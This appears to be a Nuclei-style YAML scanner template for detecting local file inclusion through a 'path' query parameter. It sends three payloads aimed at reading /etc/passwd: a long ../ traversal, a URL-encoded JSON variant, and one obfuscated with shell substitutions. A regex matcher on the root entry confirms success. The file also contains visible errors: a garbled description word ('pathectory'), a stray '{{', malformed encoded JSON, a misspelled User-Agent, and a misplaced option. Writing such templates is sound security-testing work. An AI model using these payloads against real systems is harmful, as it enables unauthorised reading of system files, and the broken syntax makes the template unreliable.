id: param-lfi2-path

info:
  name: Local File Inclusion
  author: pelo
  severity: high
  description: |
     pathectory traversal via the GET /.. substring.

  tags: param-lfi2-path

requests:
  - method: GET
    path:
      - "{{BaseURL}}?path=../../../../../../../../../../../../../etc/passwd{{"
      - "{{BaseURL}}?path=%7B%22body%22%3A%7B%22file%22%3A%22file%22%3A%2Fetc%2Fpasswd%22%70%7D"
      - "{{BaseURL}}?path=et$(u)c/pass$(te)swd?"
    headers:
     User-Agent: "Mozila/5.0 (x11; Linux x86_x64) AppleWebkit/537.36 (KHTML, like gecko) chrome/87.0.4280.67 Safari"
     stop-at-first-match: true
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

